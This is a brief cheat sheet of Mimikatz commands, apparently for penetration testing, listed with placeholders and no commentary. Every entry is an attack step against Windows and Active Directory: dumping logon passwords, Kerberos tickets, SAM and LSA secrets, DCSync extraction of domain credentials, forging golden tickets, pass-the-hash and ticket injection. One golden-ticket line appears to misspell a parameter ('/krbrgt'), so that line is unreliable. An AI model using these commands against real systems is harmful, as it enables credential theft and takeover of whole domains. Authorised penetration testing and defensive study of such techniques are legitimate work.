;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

% pentest,mimikatz

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

# privilege::debug
privilege::debug

# token::elevate
token::elevate

# sekurlsa::logonpasswords
sekurlsa::logonpasswords

# sekurlsa::tickets /export
sekurlsa::tickets /export

# lsadump::sam
lsadump::sam

# lsadump::dcsync
lsadump::dcsync /user:<domain>\<username>

# lsadump::lsa
lsadump::lsa /patch

# kerberos::golden
kerberos::golden /domain:<domain> /sid:<sid> /ptt /target:<ip> /service:<spn> /rc4:<ntlm> /user:<username>

# kerberos::golden
kerberos::golden /domain:<domain> /sid:<sid> /ptt /krbrgt:<ntlm>

# sekurlsa::pth
sekurlsa::pth /user:<username> /domain:<domain> /ntlm:<ntlm> /run:<cmd>

# kerberos::ptt
kerberos::ptt <path>

# kerberos::purge
kerberos::purge

# misc::cmd
misc::cmd
